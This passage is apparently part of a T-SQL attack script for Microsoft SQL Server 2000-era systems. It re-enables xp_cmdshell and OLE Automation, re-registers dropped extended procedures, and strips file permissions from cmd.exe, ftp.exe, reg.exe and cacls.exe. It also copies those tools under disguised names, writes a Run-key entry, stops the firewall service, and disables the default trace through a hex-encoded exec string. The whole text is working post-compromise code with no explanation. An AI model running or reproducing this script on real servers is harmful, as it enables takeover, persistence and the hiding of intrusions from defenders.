  678. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))drop procedure sp_OADestroy
  679. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))drop procedure sp_OAMethod;
  680. if  exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))drop procedure xp_regwrite
  681.  
  682. go  
  683. create procedure sp_addextendedproc
  684. @functname nvarchar(517),@dllname varchar(255) as
  685. set implicit_transactions off
  686. if @@trancount > 0
  687. begin
  688. raiserror(15002,-1,-1,'sp_addextendedproc')
  689. return (1)
  690. end
  691. dbcc addextendedproc( @functname, @dllname)
  692. return (0);  
  693.  
  694. go
  695. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_trace_setstatus]'))dbcc addextendedproc ('sp_trace_setstatus','odsole70.dll')
  696. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_regwrite]'))dbcc addextendedproc ('xp_regwrite','xpstar.dll')
  697. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')
  698. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')
  699. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')
  700. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
  701.  
  702. go
  703. DROP PROCEDURE sp_trace_setstatus;
  704. DROP PROCEDURE xp_regwrite;
  705. DROP PROCEDURE sp_OAMethod;
  706. DROP PROCEDURE sp_OACreate;
  707. DROP PROCEDURE sp_OASetProperty;
  708. DROP PROCEDURE sp_OADestroy
  709. exec sp_addextendedproc sp_trace_setstatus,'odsole70.dll';
  710. exec sp_addextendedproc xp_regwrite,'odsole70.dll';
  711. exec sp_addextendedproc sp_OAMethod,'odsole70.dll';
  712. exec sp_addextendedproc sp_OACreate,'odsole70.dll';
  713. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll';
  714. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  715.  
  716. go
  717. ECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  718. EXEC sp_OACreate 'WbemScripting.SWbemLocator',@objLocator OUTPUT;
  719. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  720. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''WSHom.Ocx''';
  721. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  722. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  723. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;
  724.  
  725. go
  726. SELECT @objRet
  727.  
  728. go  
  729. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllUnregisterServer]'))drop procedure DllUnregisterServer  
  730. dbcc addextendedproc ('DllUnregisterServer','WSHom.Ocx')  
  731. exec DllUnregisterServer  
  732. Drop Procedure DllUnregisterServer  
  733.  
  734. go
  735. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllRegisterServer]'))drop procedure DllRegisterServer  
  736. dbcc addextendedproc ('DllRegisterServer','WSHom.Ocx')  
  737. exec DllRegisterServer  
  738. Drop Procedure DllRegisterServer  
  739.  
  740. go
  741. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  742.  
  743.  
  744. go  
  745. declare @o int, @f int, @t int, @ret int  
  746. exec sp_oacreate 'scripting.filesystemobject', @o out  
  747. exec sp_oamethod @o, 'createtextfile', @f out, 'c:\windows\system32\1025\run.ini', 1  
  748. exec @ret = sp_oamethod @f, 'writeline', NULL,'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run [2 8 18]'  
  749. declare @hr int declare @object int declare @property int exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=ias\ias.mdb'  
  750. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  751.  
  752.  
  753. go  
  754. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  755. EXEC sp_OACreate 'WbemScripting.SWbemLocator',@objLocator OUTPUT;
  756. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  757. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''scrrun.dll''';
  758. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  759. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  760. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;
  761.  
  762. go
  763. SELECT @objRet  
  764.  
  765. go
  766. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllUnregisterServer]'))drop procedure DllUnregisterServer  
  767. dbcc addextendedproc ('DllUnregisterServer','scrrun.dll')  
  768. exec DllUnregisterServer  
  769. Drop Procedure DllUnregisterServer  
  770.  
  771. go
  772. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllRegisterServer]'))drop procedure DllRegisterServer  
  773. dbcc addextendedproc ('DllRegisterServer','scrrun.dll')  
  774. exec DllRegisterServer  
  775. Drop Procedure DllRegisterServer
  776.  
  777. go  
  778. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  779. EXEC sp_OACreate 'WbemScripting.SWbemLocator',@objLocator OUTPUT;
  780. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  781. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''wbem\wbemdisp.dll''';
  782. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  783. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  784. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;
  785.  
  786. go
  787. SELECT @objRet  
  788.  
  789. go
  790. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllUnregisterServer]'))drop procedure DllUnregisterServer  
  791. dbcc addextendedproc ('DllUnregisterServer','wbem\wbemdisp.dll')  
  792. exec DllUnregisterServer  
  793. Drop Procedure DllUnregisterServer
  794.  
  795. go
  796. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[DllRegisterServer]'))drop procedure DllRegisterServer  
  797. dbcc addextendedproc ('DllRegisterServer','wbem\wbemdisp.dll')  
  798. exec DllRegisterServer  
  799. Drop Procedure DllRegisterServer  
  800. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
  801.  
  802. go  
  803. DECLARE @objLocator int;DECLARE @objWMIService int;
  804. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  805. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  806. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  807. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cacls.exe''';
  808. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  809. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  810. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  811. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
  812.  
  813. go  
  814. DECLARE @objLocator int;DECLARE @objWMIService int;DECLARE @objRootSecSetting int;
  815. DECLARE @objSecurityDescriptor int;
  816. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  817. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  818. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''C:\Progra~1\Common~1\System\ado\msado15.dll''';
  819. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  820. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  821. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  822. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  823.  
  824. go  
  825. DECLARE @objLocator int;DECLARE @objWMIService int;
  826. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  827. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  828. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  829. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cmd.exe''';
  830. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  831. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  832. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  833. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  834.  
  835. go  
  836. DECLARE @objLocator int;DECLARE @objWMIService int;
  837. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  838. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  839. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  840. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''netsvchosts.exe''';
  841. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  842. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  843. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  844. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  845.  
  846. go  
  847. DECLARE @objLocator int;DECLARE @objWMIService int;
  848. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  849. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  850. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  851. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''reg.exe''';
  852. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  853. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  854. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  855. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  856.  
  857. go  
  858. DECLARE @objLocator int;DECLARE @objWMIService int;
  859. DECLARE @objRootSecSetting int;DECLARE @objSecurityDescriptor int;
  860. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  861. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  862. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''ftp.exe''';
  863. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  864. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  865. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  866. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  867.  
  868. go  
  869. DECLARE @objLocator int;DECLARE @objWMIService int;
  870. DECLARE @objRootSecSetting int;
  871. DECLARE @objSecurityDescriptor int;
  872. EXEC sp_OACreate 'wscript.shell',@objLocator OUTPUT;
  873. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWMIService OUTPUT,'.','root\cimv2';
  874. EXEC sp_OAMethod @objWMIService,'Get',@objRootSecSetting OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''p.exe''';
  875. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  876. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  877. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  878. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  879.  
  880. go  
  881. exec sp_configure 'show advanced options', 1;  
  882. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')
  883. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')
  884. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')
  885. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');  
  886. declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';  
  887. declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';  
  888. declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';  
  889. declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';  
  890. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\netmaname /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\ftp.exe /e /t /g system:F';
  891.  
  892. go  
  893. EXEC sp_configure 'show advanced options', 1;
  894. RECONFIGURE;
  895. EXEC sp_configure 'xp_cmdshell', 1;
  896. RECONFIGURE;  
  897.  
  898.  
  899. go  
  900. declare @a varchar(8000);set @a=0x657865632073705F636F6E666967757265202773686F7720616476616E636564206F7074696F6E73272C313B7265636F6E6669677572653B657865632073705F636F6E666967757265202764656661756C7420747261636520656E61626C6564272C303B7265636F6E6669677572653B6465636C61726520406920696E742C4073697A6520696E743B7365742040693D313B73656C656374204073697A65203D206D61782874726163656964292066726F6D203A3A666E5F74726163655F676574696E666F2864656661756C74293B7768696C65204069203C3D204073697A6520626567696E20657865632073705F74726163655F7365747374617475732040692C303B7365742040693D40692B313B656E643B;exec(@a);
  901.  
  902.  
  903. go
  904. exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}','Compatibility Flags','REG_DWORD',0  
  905.  
  906.  
  907. go  
  908. USE master;
  909. EXEC sp_configure 'show advanced options', 1;  
  910. RECONFIGURE WITH OVERRIDE;  
  911. EXEC sp_configure 'Ole Automation Procedures', 1;  
  912. RECONFIGURE WITH OVERRIDE;  
  913. EXEC sp_configure 'show advanced options', 0;  
  914.  
  915. go
  916. EXEC sp_configure 'show advanced options', 1;  
  917. RECONFIGURE;  
  918. go  
  919. EXEC sp_configure 'Ole Automation Procedures', 1;  
  920. RECONFIGURE;
  921.  
  922. go  
  923. dbcc dropextendedproc ("xp_cmdshell");
  924. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  925. dbcc dropextendedproc ("xp_dirtree");
  926. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  927. dbcc dropextendedproc ("xp_regread");
  928. dbcc addextendedproc ("xp_regread","xpstar.dll");
  929. dbcc dropextendedproc ("xp_regwrite");
  930. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  931.  
  932. go
  933. dbcc dropextendedproc ("sp_OACreate");dbcc addextendedproc ('sp_OACreate','odsole70.dll');
  934. dbcc dropextendedproc ("sp_OASetProperty");dbcc addextendedproc ('sp_OASetProperty','odsole70.dll');
  935. dbcc dropextendedproc ("sp_OADestroy");dbcc addextendedproc ('sp_OADestroy','odsole70.dll');
  936. dbcc dropextendedproc ("sp_OAMethod");dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
  937.  
  938.  
  939. go
  940. exec master..xp_servicecontrol 'stop','sharedaccess'
  941.  
  942. go
  943. drop procedure sp_addextendedproc
  944. drop procedure sp_oacreate
  945. exec sp_dropextendedproc 'xp_cmdshell'
  946.  
  947. go
  948. dbcc addextendedproc ("sp_oacreate","odsole70.dll")
  949. dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
  950.  
  951. go
  952. exec sp_dropextendedproc 'xp_cmdshell'
  953.  
  954. go
  955. dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
  956. ;EXEC sp_configure 'show advanced options', 0
  957.  
  958. go
  959. exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
  960. exec sp_dropextendedproc "xp_cmdshell"
  961. exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
  962. exec sp_dropextendedproc 'xp_cmdshell'
  963. exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
  964. exec sp_addextendedproc xp_dirtree,'xpstar.dll'
  965. exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
  966. exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
  967. exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
  968. exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
  969. exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
  970. exec sp_addextendedproc sp_OACreate,'odsole70.dll'
  971. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  972. exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
  973. exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
  974. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
  975. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
  976. exec sp_addextendedproc sp_OAStop,'odsole70.dll'
  977. exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
  978. exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
  979. exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
  980. exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
  981. exec sp_addextendedproc xp_regread,'xpstar.dll'
  982. exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
  983. exec sp_addextendedproc xp_regwrite,'xpstar.dll'
  984. exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
  985.  
  986. go
  987. dbcc dropextendedproc ("xp_cmdshell");
  988. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  989. dbcc dropextendedproc ("xp_dirtree");
  990. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  991. dbcc dropextendedproc ("xp_regread");
  992. dbcc addextendedproc ("xp_regread","xpstar.dll");
  993. dbcc dropextendedproc ("xp_regwrite");
  994. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  995. dbcc dropextendedproc ("xp_regdeletekey");
  996. dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
  997. dbcc dropextendedproc ("xp_regenumkeys");
  998. dbcc addextendedproc ("xp_regenumkeys","xpstar.dll");
  999. dbcc dropextendedproc ("xp_regdeletevalue");
  1000. dbcc addextendedproc ("xp_regdeletevalue","xpstar.dll");
  1001. dbcc dropextendedproc ("sp_OACreate");
  1002. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  1003. dbcc dropextendedproc ("sp_OAMethod");
  1004. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  1005. dbcc dropextendedproc ("sp_OASetProperty");
  1006. dbcc addextendedproc ("sp_OASetProperty","odsole70.dll");
  1007. dbcc dropextendedproc ("sp_OADestroy");
  1008. dbcc addextendedproc ("sp_OADestroy","odsole70.dll");
  1009.  
  1010. go
  1011. dbcc dropextendedproc ("xp_dirtree");
  1012. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  1013. dbcc dropextendedproc ("xp_regread");
  1014. dbcc addextendedproc ("xp_regread","xpstar.dll");
  1015. dbcc dropextendedproc ("xp_regwrite");
  1016. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  1017. dbcc dropextendedproc ("xp_regdeletekey");
  1018. dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
  1019. dbcc dropextendedproc ("xp_regenumkeys");
  1020. dbcc addextendedproc ("xp_regenumkeys","xpstar.dll");
  1021. dbcc dropextendedproc ("xp_regdeletevalue");
  1022. dbcc addextendedproc ("xp_regdeletevalue","xpstar.dll");
  1023. dbcc dropextendedproc ("sp_OACreate");
  1024. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  1025. dbcc addextendedproc ("sp_OACreate","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1026. dbcc addextendedproc ("sp_OACreate","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1027. dbcc addextendedproc ("sp_OACreate","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1028. dbcc addextendedproc ("sp_OACreate","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1029. dbcc addextendedproc ("sp_OACreate","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1030. dbcc dropextendedproc ("sp_OAMethod");
  1031. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  1032. dbcc addextendedproc ("sp_OAMethod","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1033. dbcc addextendedproc ("sp_OAMethod","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1034. dbcc addextendedproc ("sp_OAMethod","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1035. dbcc addextendedproc ("sp_OAMethod","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1036. dbcc addextendedproc ("sp_OAMethod","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1037. dbcc dropextendedproc ("sp_OASetProperty");
  1038. dbcc addextendedproc ("sp_OASetProperty","odsole70.dll");
  1039. dbcc addextendedproc ("sp_OASetProperty","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1040. dbcc addextendedproc ("sp_OASetProperty","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1041. dbcc addextendedproc ("sp_OASetProperty","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1042. dbcc addextendedproc ("sp_OASetProperty","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1043. dbcc addextendedproc ("sp_OASetProperty","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1044. dbcc dropextendedproc ("sp_OADestroy");
  1045. dbcc addextendedproc ("sp_OADestroy","odsole70.dll");
  1046. dbcc addextendedproc ("sp_OADestroy","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1047. dbcc addextendedproc ("sp_OADestroy","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1048. dbcc addextendedproc ("sp_OADestroy","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1049. dbcc addextendedproc ("sp_OADestroy","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1050. dbcc addextendedproc ("sp_OADestroy","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1051.  
  1052. go
  1053. exec xp_makecab 'C:\Windows\System\1.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\odsole70.dll'
  1054. exec xp_unpackcab 'C:\Windows\System\1.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1055. exec xp_unpackcab 'C:\Windows\System\1.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1056. exec xp_unpackcab 'C:\Windows\System\1.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1057. exec xp_makecab 'C:\Windows\System\2.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\odsole70.dll'
  1058. exec xp_unpackcab 'C:\Windows\System\2.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1059. exec xp_unpackcab 'C:\Windows\System\2.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1060. exec xp_unpackcab 'C:\Windows\System\2.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1061. exec xp_makecab 'C:\Windows\System\3.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\odsole70.dll'
  1062. exec xp_unpackcab 'C:\Windows\System\3.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1063. exec xp_unpackcab 'C:\Windows\System\3.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1064. exec xp_unpackcab 'C:\Windows\System\3.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1065. exec xp_makecab 'C:\Windows\System\4.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xplog70.dll'
  1066. exec xp_unpackcab 'C:\Windows\System\4.Zip','C:\Windows\System',1
  1067. exec xp_makecab 'C:\Windows\System\5.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xplog70.dll'
  1068. exec xp_unpackcab 'C:\Windows\System\5.Zip','C:\Windows\System',1
  1069. exec xp_makecab 'C:\Windows\System\6.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xplog70.dll'
  1070. exec xp_unpackcab 'C:\Windows\System\6.Zip','C:\Windows\System',1
  1071. exec xp_makecab 'C:\Windows\System\7.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xpstar.dll'
  1072. exec xp_unpackcab 'C:\Windows\System\7.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1073. exec xp_unpackcab 'C:\Windows\System\7.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1074. exec xp_unpackcab 'C:\Windows\System\7.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1075. exec xp_makecab 'C:\Windows\System\8.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xpstar.dll'
  1076. exec xp_unpackcab 'C:\Windows\System\8.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1077. exec xp_unpackcab 'C:\Windows\System\8.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1078. exec xp_unpackcab 'C:\Windows\System\8.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1079. exec xp_makecab 'C:\Windows\System\9.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xpstar.dll'
  1080. exec xp_unpackcab 'C:\Windows\System\9.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1081. exec xp_unpackcab 'C:\Windows\System\9.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1082. exec xp_unpackcab 'C:\Windows\System\9.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1083.  
  1084. go
  1085. EXEC sp_configure 'show advanced options', 1;
  1086. RECONFIGURE;
  1087. EXEC sp_configure 'xp_cmdshell', 1;
  1088. RECONFIGURE;
  1089.  
  1090. GO
  1091.  
  1092. EXEC master..xp_regdeletevalue
  1093. @rootkey='HKEY_LOCAL_MACHINE',
  1094. @key='SOFTWARE\Microsoft\Command Processor',
  1095. @value_name='Autorun'
  1096. go
  1097. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe'
  1098. go
  1099. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe'
  1100. go
